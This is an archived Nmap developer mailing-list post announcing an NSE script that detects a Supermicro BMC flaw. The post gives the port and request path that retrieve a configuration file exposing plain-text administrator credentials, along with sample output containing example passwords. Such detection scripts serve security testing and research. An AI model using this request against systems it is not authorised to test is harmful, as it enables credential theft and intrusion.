Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

NSE: bmc-supermicro-conf. Attempts to download conf file from vulnerable Supermicro BMC products

From: Paulino Calderon <paulino () calderonpale com>
Date: Fri, 20 Jun 2014 04:47:45 -0500
Hi list,

I’m attaching a NSE script to detect a serious flaw affecting Supermicro BMCs. It seems the offsets change between 
products and versions so I left the credential parser out for now. 

Cheers.

Download script: 
https://bitbucket.org/cldrn/nmap-nse-scripts/raw/aa043e48b5526253217208d20a8c61c5c967014b/scripts/6.x/bmc-supermicro-conf.nse

description = [[
Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro 
BMC products.

The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file 
contains all 
users with their passwords in plain text form.

References:
* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
]]

---
-- @usage nmap -p49152 --script bmc-supermicro-conf <target>
-- 
-- @output
-- PORT      STATE SERVICE REASON
-- 49152/tcp open  unknown syn-ack
-- | bmc-supermicro-conf: 
-- |   VULNERABLE:
-- |   Supermicro BMC configuration file disclosure
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Some Supermicro BMC products are vulnerable to an authentication bypass vulnerability that allows attackers 
to download
-- |        a configuration file containing plain text user credentials. This credentials may be used to log in to the 
administrative interface and the 
-- |       network's Active Directory.
-- |     Disclosure date: 2014-06-19
-- |     Extra information:
-- |       Snippet from configuration file:
-- |   
.............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
-- |   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
-- |   
-- |     References:
-- |_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
--
-- @args bmc-supermicro-conf.out Output file to store configuration file. Default: <ip>_bmc.conf
---
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread:

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy